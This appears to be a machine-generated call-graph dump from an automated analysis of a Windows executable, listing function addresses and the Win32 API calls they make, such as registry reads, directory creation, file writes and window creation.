4025ca 5439->5440 5441 4025dc 5440->5441 5442 403154 4 API calls 5440->5442 5441->5432 5441->5441 5442->5441 5444 407c70 5443->5444 5445 407caf 5443->5445 5444->5445 5447 407bac 5444->5447 5445->5437 5445->5438 5448 407bb7 5447->5448 5451 407bc8 5447->5451 5449 405880 4 API calls 5448->5449 5449->5451 5450 4074a0 20 API calls 5452 407bdc 5450->5452 5451->5450 5453 4074a0 20 API calls 5452->5453 5454 407bfd 5453->5454 5455 407918 InterlockedExchange 5454->5455 5456 407c12 5455->5456 5457 407c28 5456->5457 5458 405880 4 API calls 5456->5458 5457->5444 5458->5457 5460 4078d6 5459->5460 5461 4078e7 5459->5461 5462 4078db InterlockedExchange 5460->5462 5461->5007 5462->5461 6235 409e47 6236 409e6c 6235->6236 6237 4098f4 15 API calls 6236->6237 6241 409e71 6237->6241 6238 409ec4 6269 4026c4 GetSystemTime 6238->6269 6240 409ec9 6242 409330 32 API calls 6240->6242 6241->6238 6244 408dd8 4 API calls 6241->6244 6243 409ed1 6242->6243 6246 4031e8 4 API calls 6243->6246 6245 409ea0 6244->6245 6248 409ea8 MessageBoxA 6245->6248 6247 409ede 6246->6247 6249 406928 5 API calls 6247->6249 6248->6238 6250 409eb5 6248->6250 6251 409eeb 6249->6251 6252 405854 5 API calls 6250->6252 6253 4066c0 5 API calls 6251->6253 6252->6238 6254 409efb 6253->6254 6255 406638 5 API calls 6254->6255 6256 409f0c 6255->6256 6257 403340 4 API calls 6256->6257 6258 409f1a 6257->6258 6259 4031e8 4 API calls 6258->6259 6260 409f2a 6259->6260 6261 4074e0 23 API calls 6260->6261 6262 409f69 6261->6262 6263 402594 4 API calls 6262->6263 6264 409f89 6263->6264 6265 407a28 5 API calls 6264->6265 6266 409fcb 6265->6266 6267 407cb8 21 API calls 6266->6267 6268 409ff2 6267->6268 6269->6240 6196 407548 6197 407554 CloseHandle 6196->6197 6198 40755d 6196->6198 6197->6198 6648 402b48 RaiseException 6199 407749 6200 4076dc WriteFile 6199->6200 6209 407724 6199->6209 6201 4076e8 6200->6201 6202 4076ef 6200->6202 6203 40748c 21 API calls 6201->6203 6204 407700 6202->6204 6205 4073ec 20 API calls 6202->6205 6203->6202 6205->6204 6206 4077e0 6207 4078db InterlockedExchange 6206->6207 6208 407890 6206->6208 6210 4078e7 6207->6210 6209->6199 6209->6206 6649 40294a 6650 402952 6649->6650 6651 402967 6650->6651 6652 403554 4 API calls 6650->6652 6652->6650 6653 403f4a 6654 403f53 6653->6654 6655 403f5c 6653->6655 6657 403f07 6654->6657 6660 403f09 6657->6660 6659 403f3c 6659->6655 6662 403154 4 API calls 6660->6662 6664 403e9c 6660->6664 6667 403f3d 6660->6667 6680 403e9c 6660->6680 6661 403ecf 6661->6655 6662->6660 6663 403ef2 6665 402674 4 API calls 6663->6665 6664->6659 6664->6663 6669 403ea9 6664->6669 6671 403e8e 6664->6671 6665->6661 6667->6655 6669->6661 6670 402674 4 API calls 6669->6670 6670->6661 6672 403e4c 6671->6672 6673 403e67 6672->6673 6674 403e62 6672->6674 6675 403e7b 6672->6675 6678 403e78 6673->6678 6679 402674 4 API calls 6673->6679 6677 403cc8 4 API calls 6674->6677 6676 402674 4 API calls 6675->6676 6676->6678 6677->6673 6678->6663 6678->6669 6679->6678 6681 403ed7 6680->6681 6687 403ea9 6680->6687 6683 403ef2 6681->6683 6685 403e8e 4 API calls 6681->6685 6682 403ecf 6682->6660 6684 402674 4 API calls 6683->6684 6684->6682 6686 403ee6 6685->6686 6686->6683 6686->6687 6687->6682 6688 402674 4 API calls 6687->6688 6688->6682 6697 405150 6698 405163 6697->6698 6699 404e48 19 API calls 6698->6699 6700 405177 6699->6700 6270 403a52 6271 403a74 6270->6271 6272 403a5a WriteFile 6270->6272 6272->6271 6273 403a78 GetLastError 6272->6273 6273->6271 6274 402654 6275 403154 4 API calls 6274->6275 6276 402614 6275->6276 6277 402632 6276->6277 6278 403154 4 API calls 6276->6278 6277->6277 6278->6277 5645 409e62 5646 409aa0 4 API calls 5645->5646 5647 409e67 5646->5647 5648 409e6c 5647->5648 5748 402f24 5647->5748 5682 4098f4 5648->5682 5651 409ec4 5687 4026c4 GetSystemTime 5651->5687 5653 409e71 5653->5651 5753 408dd8 5653->5753 5654 409ec9 5688 409330 5654->5688 5658 409ea0 5661 409ea8 MessageBoxA 5658->5661 5659 4031e8 4 API calls 5660 409ede 5659->5660 5706 406928 5660->5706 5661->5651 5663 409eb5 5661->5663 5756 405854 5663->5756 5669 409f0c 5733 403340 5669->5733 5671 409f1a 5672 4031e8 4 API calls 5671->5672 5673 409f2a 5672->5673 5674 4074e0 23 API calls 5673->5674 5675 409f69 5674->5675 5676 402594 4 API calls 5675->5676 5677 409f89 5676->5677 5678 407a28 5 API calls 5677->5678 5679 409fcb 5678->5679 5680 407cb8 21 API calls 5679->5680 5681 409ff2 5680->5681 5760 40953c 5682->5760 5687->5654 5697 409350 5688->5697 5691 409375 CreateDirectoryA 5692 4093ed 5691->5692 5693 40937f GetLastError 5691->5693 5694 40322c 4 API calls 5692->5694 5693->5697 5695 4093f7 5694->5695 5698 4031b8 4 API calls 5695->5698 5696 408dd8 4 API calls 5696->5697 5697->5691 5697->5696 5702 407284 5 API calls 5697->5702 5705 405880 4 API calls 5697->5705 5852 406cf4 5697->5852 5875 409224 5697->5875 5894 404c84 5697->5894 5897 408da8 5697->5897 5700 409411 5698->5700 5701 4031b8 4 API calls 5700->5701 5703 40941e 5701->5703 5702->5697 5703->5659 5705->5697 6007 406820 5706->6007 5709 403454 4 API calls 5710 40694a 5709->5710 5711 4066c0 5710->5711 6012 4068e4 5711->6012 5714 4066f0 5717 403340 4 API calls 5714->5717 5715 4066fe 5716 403454 4 API calls 5715->5716 5718 406711 5716->5718 5719 4066fc 5717->5719 5720 403340 4 API calls 5718->5720 5721 403198 4 API calls 5719->5721 5720->5719 5722 406733 5721->5722 5723 406638 5722->5723 5724 406642 5723->5724 5725 406665 5723->5725 6018 406950 5724->6018 5727 40322c 4 API calls 5725->5727 5729 40666e 5727->5729 5728 406649 5728->5725 5730 406654 5728->5730 5729->5669 5731 403340 4 API calls 5730->5731 5732 406662 5731->5732 5732->5669 5734 403344 5733->5734 5735 4033a5 5733->5735 5736 4031e8 5734->5736 5737 40334c 5734->5737 5739 4031fc 5736->5739 5741 403254 4 API calls 5736->5741 5737->5735 5738 40335b 5737->5738 5742 4031e8 4 API calls 5737->5742 5743 403254 4 API calls 5738->5743 5740 403228 5739->5740 5744 4025ac 4 API calls 5739->5744 5740->5671 5741->5739 5742->5738 5745 403375 5743->5745 5744->5740 5746 4031e8 4 API calls 5745->5746 5747 4033a1 5746->5747 5747->5671 5749 403154 4 API calls 5748->5749 5750 402f29 5749->5750 6024 402bcc 5750->6024 5752 402f51 5752->5752 5754 408da8 4 API calls 5753->5754 5755 408df4 5754->5755 5755->5658 5757 405859 5756->5757 5758 405930 5 API calls 5757->5758 5759 40586b 5758->5759 5759->5759 5767 40955b 5760->5767 5761 409590 5764 40959d GetUserDefaultLangID 5761->5764 5768 409592 5761->5768 5762 409594 5778 407024 GetModuleHandleA GetProcAddress 5762->5778 5764->5768 5766 40956f 5772 409884 5766->5772 5767->5761 5767->5762 5767->5766 5768->5766 5769 4095cb GetACP 5768->5769 5770 4095ef 5768->5770 5769->5766 5769->5768 5770->5766 5771 409615 GetACP 5770->5771 5771->5766 5771->5770 5773 40988c 5772->5773 5777 4098c6 5772->5777 5774 403420 4 API calls 5773->5774 5773->5777 5775 4098c0 5774->5775 5836 408e80 5775->5836 5777->5653 5779 407067 5778->5779 5780 40705e 5778->5780 5781 407070 5779->5781 5782 4070a8 5779->5782 5791 403198 4 API calls 5780->5791 5799 406f68 5781->5799 5784 406f68 RegOpenKeyExA 5782->5784 5786 4070c1 5784->5786 5785 407089 5787 4070de 5785->5787 5802 406f5c 5785->5802 5786->5787 5788 406f5c 6 API calls 5786->5788 5789 40322c 4 API calls 5787->5789 5792 4070d5 RegCloseKey 5788->5792 5793 4070eb 5789->5793 5795 407120 5791->5795 5792->5787 5805 4032fc 5793->5805 5797 403198 4 API calls 5795->5797 5798 407128 5797->5798 5798->5768 5800 406f73 5799->5800 5801 406f79 RegOpenKeyExA 5799->5801 5800->5801 5801->5785 5819 406e10 5802->5819 5806 403300 5805->5806 5807 40333f 5805->5807 5808 4031e8 5806->5808 5809 40330a 5806->5809 5807->5780 5815 4031fc 5808->5815 5816 403254 4 API calls 5808->5816 5810 403334 5809->5810 5811 40331d 5809->5811 5814 4034f0 4 API calls 5810->5814 5812 4034f0 4 API calls 5811->5812 5817 403322 5812->5817 5813 403228 5813->5780 5814->5817 5815->5813 5818 4025ac 4 API calls 5815->5818 5816->5815 5817->5780 5818->5813 5820 406e36 RegQueryValueExA 5819->5820 5821 406e59 5820->5821 5826 406e7b 5820->5826 5822 406e73 5821->5822 5821->5826 5827 403278 4 API calls 5821->5827 5828 403420 4 API calls 5821->5828 5824 403198 4 API calls 5822->5824 5823 403198 4 API calls 5825 406f47 RegCloseKey 5823->5825 5824->5826 5825->5787 5826->5823 5827->5821 5829 406eb0 RegQueryValueExA 5828->5829 5829->5820 5830 406ecc 5829->5830 5830->5826 5831 4034f0 4 API calls 5830->5831 5832 406f0e 5831->5832 5833 406f20 5832->5833 5835 403420 4 API calls 5832->5835 5834 4031e8 4 API calls 5833->5834 5834->5826 5835->5833 5837 408e8e 5836->5837 5839 408ea6 5837->5839 5849 408e18 5837->5849 5840 408e18 4 API calls 5839->5840 5841 408eca 5839->5841 5840->5841 5842 407918 InterlockedExchange 5841->5842 5843 408ee5 5842->5843 5844 408e18 4 API calls 5843->5844 5846 408ef8 5843->5846 5844->5846 5845 408e18 4 API calls 5845->5846 5846->5845 5847 403278 4 API calls 5846->5847 5848 408f27 5846->5848 5847->5846 5848->5777 5850 405880 4 API calls 5849->5850 5851 408e29 5850->5851 5851->5839 5901 406a58 5852->5901 5855 406d26 5857 406a58 5 API calls 5855->5857 5859 406d72 5855->5859 5858 406d36 5857->5858 5860 406d42 5858->5860 5862 406a34 7 API calls 5858->5862 5909 406888 5859->5909 5860->5859 5865 406a58 5 API calls 5860->5865 5871 406d67 5860->5871 5862->5860 5867 406d5b 5865->5867 5866 406638 5 API calls 5868 406d87 5866->5868 5869 406a34 7 API calls 5867->5869 5867->5871 5870 40322c 4 API calls 5868->5870 5869->5871 5872 406d91 5870->5872 5871->5859 5921 406cc8 GetWindowsDirectoryA 5871->5921 5873 4031b8 4 API calls 5872->5873 5874 406dab 5873->5874 5874->5697 5876 409244 5875->5876 5877 406638 5 API calls 5876->5877 5878 40925d 5877->5878 5879 40322c 4 API calls 5878->5879 5884 409268 5879->5884 5881 406978 6 API calls 5881->5884 5882 4033b4 4 API calls 5882->5884 5883 408dd8 4 API calls 5883->5884 5884->5881 5884->5882 5884->5883 5885 405880 4 API calls 5884->5885 5887 4092e4 5884->5887 5961 4091b0 5884->5961 5969 409034 5884->5969 5885->5884 5888 40322c 4 API calls 5887->5888 5889 4092ef 5888->5889 5890 4031b8 4 API calls 5889->5890 5891 409309 5890->5891 5892 403198 4 API calls 5891->5892 5893 409311 5892->5893 5893->5697 5895 405198 19 API calls 5894->5895 5896 404ca2 5895->5896 5896->5697 5898 408dc8 5897->5898 5997 408c80 5898->5997 5902 4034f0 4 API calls 5901->5902 5903 406a6b 5902->5903 5904 406a82 GetEnvironmentVariableA 5903->5904 5908 406a95 5903->5908 5923 406dec 5903->5923 5904->5903 5905 406a8e 5904->5905 5906 403198 4 API calls 5905->5906 5906->5908 5908->5855 5918 406a34 5908->5918 5910 403414 5909->5910 5911 4068ab GetFullPathNameA 5910->5911 5912 4068b7 5911->5912 5913 4068ce 5911->5913 5912->5913 5914 4068bf 5912->5914 5915 40322c 4 API calls 5913->5915 5916 403278 4 API calls 5914->5916 5917 4068cc 5915->5917 5916->5917 5917->5866 5927 4069dc 5918->5927 5922 406ce9 5921->5922 5922->5859 5924 406dfa 5923->5924 5925 4034f0 4 API calls 5924->5925 5926 406e08 5925->5926 5926->5903 5934 406978 5927->5934 5929 4069fe 5930 406a06 GetFileAttributesA 5929->5930 5931 406a1b 5930->5931 5932 403198 4 API calls 5931->5932 5933 406a23 5932->5933 5933->5855 5944 406744 5934->5944 5936 4069b0 5939 4069c6 5936->5939 5940 4069bb 5936->5940 5938 406989 5938->5936 5951 406970 CharPrevA 5938->5951 5952 403454 5939->5952 5941 40322c 4 API calls 5940->5941 5943 4069c4 5941->5943 5943->5929 5947 406755 5944->5947 5945 4067b9 5946 406680 IsDBCSLeadByte 5945->5946 5948 4067b4 5945->5948 5946->5948 5947->5945 5949 406773 5947->5949 5948->5938 5949->5948 5959 406680 IsDBCSLeadByte 5949->5959 5951->5938 5953 403486 5952->5953 5954 403459 5952->5954 5955 403198 4 API calls 5953->5955 5954->5953 5957 40346d 5954->5957 5956 40347c 5955->5956 5956->5943 5958 403278 4 API calls 5957->5958 5958->5956 5960 406694 5959->5960 5960->5949 5962 403198 4 API calls 5961->5962 5965 4091d1 5962->5965 5966 4091fe 5965->5966 5978 4032a8 5965->5978 5981 403494 5965->5981 5967 403198 4 API calls 5966->5967 5968 409213 5967->5968 5968->5884 5985 408f70 5969->5985 5971 40904a 5972 40904e 5971->5972 5991 406a48 5971->5991 5972->5884 5975 409081 5994 408fac 5975->5994 5979 403278 4 API calls 5978->5979 5980 4032b5 5979->5980 5980->5965 5982 403498 5981->5982 5984 4034c3 5981->5984 5983 4034f0 4 API calls 5982->5983 5983->5984 5984->5965 5986 408f7a 5985->5986 5987 408f7e 5985->5987 5986->5971 5988 408fa0 SetLastError 5987->5988 5989 408f87 Wow64DisableWow64FsRedirection 5987->5989 5990 408f9b 5988->5990 5989->5990 5990->5971 5992 4069dc 7 API calls 5991->5992 5993 406a52 GetLastError 5992->5993 5993->5975 5995 408fb1 Wow64RevertWow64FsRedirection 5994->5995 5996 408fbb 5994->5996 5995->5996 5996->5884 5998 403198 4 API calls 5997->5998 6004 408cb1 5997->6004 5998->6004 5999 408cdc 6000 4031b8 4 API calls 5999->6000 6002 408d69 6000->6002 6001 408cc8 6005 4032fc 4 API calls 6001->6005 6002->5697 6003 403278 4 API calls 6003->6004 6004->5999 6004->6001 6004->6003 6006 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6004->6006 6005->5999 6006->6004 6008 406744 IsDBCSLeadByte 6007->6008 6010 406835 6008->6010 6009 40687f 6009->5709 6010->6009 6011 406680 IsDBCSLeadByte 6010->6011 6011->6010 6013 4068f3 6012->6013 6014 406820 IsDBCSLeadByte 6013->6014 6016 4068fe 6014->6016 6015 4066ea 6015->5714 6015->5715 6016->6015 6017 406680 IsDBCSLeadByte 6016->6017 6017->6016 6019 406957 6018->6019 6020 40695b 6018->6020 6019->5728 6023 406970 CharPrevA 6020->6023 6022 40696c 6022->5728 6023->6022 6025 402bd5 RaiseException 6024->6025 6026 402be6 6024->6026 6025->6026 6026->5752 6279 402e64 6280 402e69 6279->6280 6281 402e7a RtlUnwind 6280->6281 6282 402e5e 6280->6282 6283 402e9d 6281->6283 6300 40667c IsDBCSLeadByte 6301 406694 6300->6301 6713 403f7d 6714 403fa2 6713->6714 6717 403f84 6713->6717 6716 403e8e 4 API calls 6714->6716 6714->6717 6715 403f8c 6716->6717 6717->6715 6718 402674 4 API calls 6717->6718 6719 403fca 6718->6719 6726 403d02 6733 403d12 6726->6733 6727 403ddf ExitProcess 6728 403db8 6730 403cc8 4 API calls 6728->6730 6729 403dea 6731 403dc2 6730->6731 6732 403cc8 4 API calls 6731->6732 6734 403dcc 6732->6734 6733->6727 6733->6728 6733->6729 6733->6733 6736 403da4 6733->6736 6737 403d8f MessageBoxA 6733->6737 6746 4019dc 6734->6746 6742 403fe4 6736->6742 6737->6728 6739 403dd1 6739->6727 6739->6729 6743 403fe8 6742->6743 6744 403f07 4 API calls 6743->6744 6745 404006 6744->6745 6747 401abb 6746->6747 6748 4019ed 6746->6748 6747->6739 6749 401a04 RtlEnterCriticalSection 6748->6749 6750 401a0e LocalFree 6748->6750 6749->6750 6751 401a41 6750->6751 6752 401a2f VirtualFree 6751->6752 6753 401a49 6751->6753 6752->6751 6754 401a70 LocalFree 6753->6754 6755 401a87 6753->6755 6754->6754 6754->6755 6756 401aa9 RtlDeleteCriticalSection 6755->6756 6757 401a9f RtlLeaveCriticalSection 6755->6757 6756->6739 6757->6756 6310 404206 6311 40420a 6310->6311 6312 4041cc 6310->6312 6313 404282 6311->6313 6314 403154 4 API calls 6311->6314 6315 404323 6314->6315 6316 402c08 6319 402c82 6316->6319 6320 402c19 6316->6320 6317 402c56 RtlUnwind 6318 403154 4 API calls 6317->6318 6318->6319 6320->6317 6320->6319 6323 402b28 6320->6323 6324 402b31 RaiseException 6323->6324 6325 402b47 6323->6325 6324->6325 6325->6317 6326 408c10 6327 408c17 6326->6327 6328 403198 4 API calls 6327->6328 6336 408cb1 6328->6336 6329 408cdc 6330 4031b8 4 API calls 6329->6330 6332 408d69 6330->6332 6331 408cc8 6334 4032fc 4 API calls 6331->6334 6333 403278 4 API calls 6333->6336 6334->6329 6335 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6335->6336 6336->6329 6336->6331 6336->6333 6336->6335 6337 40a011 6338 40a036 6337->6338 6339 407918 InterlockedExchange 6338->6339 6341 40a060 6339->6341 6340 40a070 6347 4076ac SetEndOfFile 6340->6347 6341->6340 6342 409aa0 4 API calls 6341->6342 6342->6340 6344 40a08c 6345 4025ac 4 API calls 6344->6345 6346 40a0c3 6345->6346 6348 4076c3 6347->6348 6349 4076bc 6347->6349 6348->6344 6350 40748c 21 API calls 6349->6350 6350->6348 6762 409916 6763 409918 6762->6763 6764 40993a 6763->6764 6765 409956 CallWindowProcA 6763->6765 6765->6764 6078 407017 6079 407008 SetErrorMode 6078->6079 6355 403018 6356 403070 6355->6356 6357 403025 6355->6357 6358 40302a RtlUnwind 6357->6358 6359 40304e 6358->6359 6361 402f78 6359->6361 6362 402be8 6359->6362 6363 402bf1 RaiseException 6362->6363 6364 402c04 6362->6364 6363->6364 6364->6356 6772 409918 6773 409927 6772->6773 6774 40993a 6772->6774 6773->6774 6775 409956 CallWindowProcA 6773->6775 6775->6774 6369 40901e 6370 409010 6369->6370 6371 408fac Wow64RevertWow64FsRedirection 6370->6371 6372 409018 6371->6372 6373 409020 SetLastError 6374 409029 6373->6374 6385 403a28 ReadFile 6386 403a46 6385->6386 6387 403a49 GetLastError 6385->6387 6216 40762c ReadFile 6217 407663 6216->6217 6218 40764c 6216->6218 6219 407652 GetLastError 6218->6219 6220 40765c 6218->6220 6219->6217 6219->6220 6221 40748c 21 API calls 6220->6221 6221->6217 6392 40a02c 6393 409aa0 4 API calls 6392->6393 6394 40a031 6393->6394 6395 40a036 6394->6395 6396 402f24 5 API calls 6394->6396 6397 407918 InterlockedExchange 6395->6397 6396->6395 6398 40a060 6397->6398 6399 40a070 6398->6399 6400 409aa0 4 API calls 6398->6400 6401 4076ac 22 API calls 6399->6401 6400->6399 6402 40a08c 6401->6402 6403 4025ac 4 API calls 6402->6403 6404 40a0c3 6403->6404 6776 40712e 6777 407118 6776->6777 6778 403198 4 API calls 6777->6778 6779 407120 6778->6779 6780 403198 4 API calls 6779->6780 6781 407128 6780->6781 6782 408f30 6785 408dfc 6782->6785 6786 408e05 6785->6786 6787 403198 4 API calls 6786->6787 6788 408e13 6786->6788 6787->6786 6789 403932 6790 403924 6789->6790 6793 40374c 6790->6793 6792 40392c 6794 403766 6793->6794 6795 403759 6793->6795 6794->6792 6795->6794 6796 403779 VariantClear 6795->6796 6796->6792 6027 4075c4 SetFilePointer 6028 4075f7 6027->6028 6029 4075e7 GetLastError 6027->6029 6029->6028 6030 4075f0 6029->6030 6031 40748c 21 API calls 6030->6031 6031->6028 6405 405ac4 6406 405acc 6405->6406 6410 405ad4 6405->6410 6407 405ad2 6406->6407 6408 405adb 6406->6408 6412 405a3c 6407->6412 6409 405930 5 API calls 6408->6409 6409->6410 6418 405a44 6412->6418 6413 405a5e 6415 405a63 6413->6415 6416 405a7a 6413->6416 6414 403154 4 API calls 6414->6418 6419 405930 5 API calls 6415->6419 6417 403154 4 API calls 6416->6417 6421 405a7f 6417->6421 6418->6413 6418->6414 6420 405a76 6419->6420 6423 403154 4 API calls 6420->6423 6422 4059a0 19 API calls 6421->6422 6422->6420 6424 405aa8 6423->6424 6425 403154 4 API calls 6424->6425 6426 405ab6 6425->6426 6426->6410 6427 4076c8 WriteFile 6428 4076e8 6427->6428 6429 4076ef 6427->6429 6430 40748c 21 API calls 6428->6430 6431 407700 6429->6431 6432 4073ec 20 API calls 6429->6432 6430->6429 6432->6431 6433 40a2ca 6442 4096fc 6433->6442 6436 402f24 5 API calls 6437 40a2d4 6436->6437 6438 403198 4 API calls 6437->6438 6439 40a2f3 6438->6439 6440 403198 4 API calls 6439->6440 6441 40a2fb 6440->6441 6451 40569c 6442->6451 6444 409745 6448 403198 4 API calls 6444->6448 6445 409717 6445->6444 6457 40720c 6445->6457 6447 409735 6450 40973d MessageBoxA 6447->6450 6449 40975a 6448->6449 6449->6436 6450->6444 6452 403154 4 API calls 6451->6452 6454 4056a1 6452->6454 6453 4056b9 6453->6445 6454->6453 6455 403154 4 API calls 6454->6455 6456 4056af 6455->6456 6456->6445 6458 40569c 4 API calls 6457->6458 6459 40721b 6458->6459 6460 407221 6459->6460 6461 40722f 6459->6461 6462 40322c 4 API calls 6460->6462 6463 40723f 6461->6463 6466 40724b 6461->6466 6465 40722d 6462->6465 6468 4071d0 6463->6468 6465->6447 6475 4032b8 6466->6475 6469 40322c 4 API calls 6468->6469 6470 4071df 6469->6470 6471 4071fc 6470->6471 6472 406950 CharPrevA 6470->6472 6471->6465 6473 4071eb 6472->6473 6473->6471 6474 4032fc 4 API calls 6473->6474 6474->6471 6476 403278 4 API calls 6475->6476 6477 4032c2 6476->6477 6477->6465 6478 402ccc 6479 402cdd 6478->6479 6483 402cfe 6478->6483 6480 402d88 RtlUnwind 6479->6480 6482 402b28 RaiseException 6479->6482 6479->6483 6481 403154 4 API calls 6480->6481 6481->6483 6484 402d7f 6482->6484 6484->6480 6805 403fcd 6806 403f07 4 API calls 6805->6806 6807 403fd6 6806->6807 6808 403e9c 4 API calls 6807->6808 6809 403fe2 6808->6809 5463 4024d0 5464 4024e4 5463->5464 5465 4024f7 5463->5465 5502 401918 RtlInitializeCriticalSection 5464->5502 5467 402518 5465->5467 5468 40250e RtlEnterCriticalSection 5465->5468 5479 402300 5467->5479 5468->5467 5471 4024ed 5473 402525 5476 402581 5473->5476 5477 402577 RtlLeaveCriticalSection 5473->5477 5475 402531 5475->5473 5509 40215c 5475->5509 5477->5476 5480 402314 5479->5480 5481 402335 5480->5481 5482 4023b8 5480->5482 5484 402344 5481->5484 5523 401b74 5481->5523 5482->5484 5487 402455 5482->5487 5526 401d80 5482->5526 5534 401e84 5482->5534 5484->5473 5489 401fd4 5484->5489 5487->5484 5530 401d00 5487->5530 5490 401fe8 5489->5490 5491 401ffb 5489->5491 5492 401918 4 API calls 5490->5492 5493 402012 RtlEnterCriticalSection 5491->5493 5496 40201c 5491->5496 5494 401fed 5492->5494 5493->5496 5494->5491 5495 401ff1 5494->5495 5499 402052 5495->5499 5496->5499 5616 401ee0 5496->5616 5499->5475 5500 402147 5500->5475 5501 40213d RtlLeaveCriticalSection 5501->5500 5503 40193c RtlEnterCriticalSection 5502->5503 5504 401946 5502->5504 5503->5504 5505 401964 LocalAlloc 5504->5505 5506 40197e 5505->5506 5507 4019c3 RtlLeaveCriticalSection 5506->5507 5508 4019cd 5506->5508 5507->5508 5508->5465 5508->5471 5510 40217a 5509->5510 5511 402175 5509->5511 5512 4021ab RtlEnterCriticalSection 5510->5512 5515 4021b5 5510->5515 5519 40217e 5510->5519 5513 401918 4 API calls 5511->5513 5512->5515 5513->5510 5514 4021c1 5517 4022e3 RtlLeaveCriticalSection 5514->5517 5518 4022ed 5514->5518 5515->5514 5516 402244 5515->5516 5521 402270 5515->5521 5516->5519 5520 401d80 7 API calls 5516->5520 5517->5518 5518->5473 5519->5473 5520->5519 5521->5514 5522 401d00 7 API calls 5521->5522 5522->5514 5524 40215c 9 API calls 5523->5524 5525 401b95 5524->5525 5525->5484 5527 401d92 5526->5527 5528 401d89 5526->5528 5527->5482 5528->5527 5529 401b74 9 API calls 5528->5529 5529->5527 5531 401d1e 5530->5531 5532 401d4e 5530->5532 5531->5484 5532->5531 5539 401c68 5532->5539 5594 401768 5534->5594 5536 401e99 5537 401ea6 5536->5537 5605 401dcc 5536->5605 5537->5482 5540 401c7a 5539->5540 5541 401c9d 5540->5541 5542 401caf 5540->5542 5552 40188c 5541->5552 5543 40188c 3 API calls 5542->5543 5545 401cad 5543->5545 5546 401cc5 5545->5546 5562 401b44 5545->5562 5546->5531 5548 401cd4 5549 401cee 5548->5549 5567 401b98 5548->5567 5572 4013a0 5549->5572 5553 4018b2 5552->5553 5561 40190b 5552->5561 5576 401658 5553->5576 5558 4018e6 5560 4013a0 LocalAlloc 5558->5560 5558->5561 5560->5561 5561->5545 5563 401b52 5562->5563 5564 401b61 5562->5564 5565 401d00 9 API calls 5563->5565 5564->5548 5566 401b5f 5565->5566 5566->5548 5568 401bab 5567->5568 5569 401b9d 5567->5569 5568->5549 5570 401b74 9 API calls 5569->5570 5571 401baa 5570->5571 5571->5549 5573 4013ab 5572->5573 5574 4012e4 LocalAlloc 5573->5574 5575 4013c6 5573->5575 5574->5575 5575->5546 5578 40168f 5576->5578 5577 4016cf 5580 40132c 5577->5580 5578->5577 5579 4016a9 VirtualFree 5578->5579 5579->5578 5581 401348 5580->5581 5588 4012e4 5581->5588 5584 40150c 5586 40153b 5584->5586 5585 401594 5585->5558 5586->5585 5587 401568 VirtualFree 5586->5587 5587->5586 5591 40128c 5588->5591 5592 401298 LocalAlloc 5591->5592 5593 4012aa 5591->5593 5592->5593 5593->5558 5593->5584 5595 401787 5594->5595 5596 40183b 5595->5596 5597 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 5595->5597 5599 40132c LocalAlloc 5595->5599 5600 401821 5595->5600 5601 4017d6 5595->5601 5602 4017e7 5596->5602 5612 4015c4 5596->5612 5597->5595 5599->5595 5603 40150c VirtualFree 5600->5603 5604 40150c VirtualFree 5601->5604 5602->5536 5603->5602 5604->5602 5606 401d80 9 API calls 5605->5606 5607 401de0 5606->5607 5608 40132c LocalAlloc 5607->5608 5609 401df0 5608->5609 5610 401b44 9 API calls 5609->5610 5611 401df8 5609->5611 5610->5611 5611->5537 5613 40160a 5612->5613 5614 401626 VirtualAlloc 5613->5614 5615 40163a 5613->5615 5614->5613 5614->5615 5615->5602 5620 401ef0 5616->5620 5617 401f1c 5618 401d00 9 API calls 5617->5618 5621 401f40 5617->5621 5618->5621 5620->5617 5620->5621 5622 401e58 5620->5622 5621->5500 5621->5501 5627 4016d8 5622->5627 5625 401dcc 9 API calls 5626 401e75 5625->5626 5626->5620 5633 4016f4 5627->5633 5629 4016fe 5630 4015c4 VirtualAlloc 5629->5630 5635 40170a 5630->5635 5631 40175b 5631->5625 5631->5626 5632 40132c LocalAlloc 5632->5633 5633->5629 5633->5631 5633->5632 5634 40174f 5633->5634 5637 401430 5633->5637 5636 40150c VirtualFree 5634->5636 5635->5631 5636->5631 5638 40143f VirtualAlloc 5637->5638 5640 40146c 5638->5640 5641 40148f 5638->5641 5642 4012e4 LocalAlloc 5640->5642 5641->5633 5643 401478 5642->5643 5643->5641 5644 40147c VirtualFree 5643->5644 5644->5641 6485 4028d2 6486 4028da 6485->6486 6487 403554 4 API calls 6486->6487 6488 4028ef 6486->6488 6487->6486 6489 4025ac 4 API calls 6488->6489 6490 4028f4 6489->6490 6810 4019d3 6811 4019ba 6810->6811 6812 4019c3 RtlLeaveCriticalSection 6811->6812 6813 4019cd 6811->6813 6812->6813 6032 407fd4 6033 407fe6 6032->6033 6035 407fed 6032->6035 6043 407f10 6033->6043 6037 408015 6035->6037 6038 408017 6035->6038 6042 408021 6035->6042 6036 40804e 6057 407e2c 6037->6057 6054 407d7c 6038->6054 6039 407d7c 19 API calls 6039->6036 6042->6036 6042->6039 6044 407f25 6043->6044 6045 407d7c 19 API calls 6044->6045 6046 407f34 6044->6046 6045->6046 6047 407f6e 6046->6047 6048 407d7c 19 API calls 6046->6048 6049 407f82 6047->6049 6050 407d7c 19 API calls 6047->6050 6048->6047 6053 407fae 6049->6053 6064 407eb8 6049->6064 6050->6049 6053->6035 6067 4058b4 6054->6067 6056 407d9e 6056->6042 6058 405184 19 API calls 6057->6058 6059 407e57 6058->6059 6075 407de4 6059->6075 6061 407e5f 6062 403198 4 API calls 6061->6062 6063 407e74 6062->6063 6063->6042 6065 407ec7 VirtualFree 6064->6065 6066 407ed9 VirtualAlloc 6064->6066 6065->6066 6066->6053 6068 4058c0 6067->6068 6069 405184 19 API calls 6068->6069 6070 4058ed 6069->6070 6071 4031e8 4 API calls 6070->6071 6072 4058f8 6071->6072 6073 403198 4 API calls 6072->6073 6074 40590d 6073->6074 6074->6056 6076 4058b4 19 API calls 6075->6076 6077 407e06 6076->6077 6077->6061 6495 40a0d5 6496 40a105 6495->6496 6497 40a10f CreateWindowExA SetWindowLongA 6496->6497 6498 405184 19 API calls 6497->6498 6499 40a192 6498->6499 6500 4032fc 4 API calls 6499->6500 6501 40a1a0 6500->6501 6502 4032fc 4 API calls 6501->6502 6503 40a1ad 6502->6503 6504 406b7c 5 API calls 6503->6504 6505 40a1b9 6504->6505 6506 4032fc 4 API calls 6505->6506 6507 40a1c2 6506->6507 6508 4099a4 29 API calls 6507->6508 6509 40a1d4 6508->6509 